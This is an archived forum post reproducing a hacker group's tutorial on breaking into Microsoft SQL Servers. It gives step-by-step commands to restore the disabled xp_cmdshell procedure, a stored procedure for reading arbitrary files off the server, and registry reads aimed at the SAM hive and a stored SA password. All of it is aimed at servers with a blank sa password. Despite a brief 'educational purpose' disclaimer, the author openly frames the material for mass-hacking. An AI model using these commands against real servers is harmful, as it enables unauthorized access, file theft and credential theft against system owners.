Gonzalez Posted July 4, 2007 Report Posted July 4, 2007 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++This is a little Disclaimer for if you havn't read the one on our site. ++The tools and tutorials KD-Team develops and publishes are only ment for ++educational purpose only.WE DO NOT encourage the use of this tools and ++tutorials for mailicious purpose.We learned a lot during the development of them ++so we hope you also learn and don't just use it without any brains. ++We take completly NO responsability for any damage caused by them nor ++are we or our isp responsible for what you do with them. ++Greetz: KD-Team ++[url]http://www.kd-team.com[/url] +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++************************************************************************************************Hacking Secured SQL Servers **Tutorial Written By: kd-team **Creditz: Swiv,[url]www.google.com,www.sqlsecurity.com[/url] * *Use on you're own Risk. **All the things in here will only work if the corresponding .dll files exist and are original.************************************************************************************************0) Index1) Tools Needed2) The Easiest Way3) Restoring xp_cmdshell4) Reading almost any file on server5) Reading The Registry7) Final Words0) IndexThis tutorial is intended as a guide to hack the secured sql servers. Conentrating on the wellknown SQL_ERROR respons.This means:- Hack sql servers that has only got a normmal user pass- Hack sql servers where the stored proceduure xp_cmdshell has been disabledThis DOESN'T mean:- Hack sql servers where the .dll has been changed or switched with another one.- Explaining how to bruteforce sql server aaccountsHope this tutorials is ofany use to those who want hack more things or just want to know things.Plz bitch about this tut if things don't work but don't start bitching that it is to slowto hack more then 10 machines a day.I also want to thank Swiv for his time to answer my question and to his portion of contribution to thistutorial.1) Tools Needed- A server with port 1433 open and the corrrect username/password- osql.exe- sqlexec.exe written by sunx (the 1 with tthat has the green apple as icon)ALSO keep in mind that all of the given commands only work if they are enabled else it will fail*********************************************************************************************************2) The Easiest WayFirst of all make shure you use the correct sqlexec version and not "sqlexec for nethacker 1.0"So use sqlexec.exe that has a green apple als icon.When opening it has a very simple interface and only 1 thing that "sqlexec for nethacker 1.0" hasn't gotthat is the format field. In that combobox (that is empty when opening the app) you can select 4 waysof sending the data to the sql server.The options:1 xp_cmdshell"%s"2 select * from openrowset etc3 create procedure #proc_temp etc4 %sOption 1 is the same as in "sqlexec for nethacker 1.0" So when "sqlexec for nethacker 1.0" gives aSQL_ERROR this app wil do also BUT when selecting option 2 most of the time you will be able to hackthe server in normal way.*********************************************************************************************************3) Restoring xp_cmdshellRestoring xp_cmdshell seems like difficult task but in fact it is easy.first of all this only works when the stored procedure xp_cmdshell is dropt if the .dll has been changedthen it won't work.Tis is only intended when the easy way doesn't work but most of the time it does.Put the following in a .txt(example: restore.txt) and save it in te same directory as osql.exe is//////////////////////////////////////////////////////////////////////////////////////////////////////use master /exec sp_addextendedproc 'xp_cmdshell', 'C:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll'/go ///////////////////////////////////////////////////////////////////////////////////////////////////////The above path depends on the installation of MSSQL so it can be different under some circumstances.when done execute osql.exe like this:osql.exe -S 123.123.123.123 -U sa -P "" -i restore.txtNow if everything went how it is supposed to go, the xp_cmdshell is enabled again and you can use option1 from sqlexec or the other app to hack the machine.If you want to view all stored procedure on the server currently in youre power execute osql like:osql.exe -S 123.123.123.123 -U sa -P "" -Q "sp_stored_procedures"Keep in mind that this also has got procedures made by a admin and maybe hasn't got the standard ones.*********************************************************************************************************4) Reading almost any file on serverI say any because sometimes when the file is to big it refuses to read it. It also refuses to read whenthe file is in use.First of all check if the file is on the server before attempting to read it for that execute osql like:osql.exe -S 123.123.123.123 -U sa -P "" -Q "xp_getfiledetails 'c:\winnt\system32\net.exe'"If the file exists it will give back some numbers meaning filesize,date etc.When teh respond was a positive repost put the following in a .txt(example: read.txt) and make shure itis in the same folder as osql.exe////////////////////////////////////////////////////////Create proc sp_readTextFile @filename sysname /as /begin /set nocount on /Create table #tempfile (line varchar(8000)) /exec ('bulk insert #tempfile from "' + @filename + '"')/select * from #tempfile /drop table #tempfile /End /go /////////////////////////////////////////////////////////when done execute osql.exe like this:osql.exe -S 123.123.123.123 -U sa -P "" -i read.txtYou have now succesfully created a stored procedure to read files.Now how doyou read files with it?Very simple use osql.exe like this:osql.exe -S 123.123.123.123 -U sa -P "" -Q "sp_readTextFile 'C:\winnt\system32\drivers\etc\services'" -o c:\breadfile.txtThen just browse to youre local C: and there you will find the file.Only problem is there will be a lotof wite stripes and "-" character that is the normal sql output way I can't do anything about that.*********************************************************************************************************5) Reading The RegistryReading the registry cna be handy when there is valuable information stored into it like passwords orusernames.I'll give a little example on how to read the sam file just take 1 note even if you read the sam file ona win2k machine it is useless because of the standard security it has. Explanation on what you can dowith registry reading will be explained later.Fire up osql.exe and execute it like this:osql.exe -S 123.123.123.123 -U sa -P "" -Q "USE master EXEC xp_regread ‘HKEY_LOCAL_MACHINE’, ‘SECURITY\SAM\Domains\Account’, ‘F’"and in this key:HKEY_CURRENT_USER\SOFTWARE\Microsoft\MSSQLServer\SQLEW\Registered Server\SQL 6.5the password of the SA user is stored in plain text could be handy if you hack a machine that has sqlrunning and the hack has got no super user rights like IISMEDIA exploit. then just grab the sql passfrom the registry.*********************************************************************************************************6) Final WordsHope this has been of some help I can give NO garantee everything in here will work under differentcircumstances. But all citics are welcome.Further I have spend some time investigating all this and trying to explain it in a simple as possible wayso I say again don't bitch if this ain't good enough for mass-hacking.For the rest keep learning and finding out things peeps Hacking is something you gotta feel.Don't be lame, don't be lazy try thinigs yourself it really pays back.1 final note:I did not give scenario's and solutions on purpose I hope that with he info that is in this paperyou all will have enough imagination to hack something with it. Maybe later on I will make a scenarioand solutions paper about this.Greetz,kd-team Quote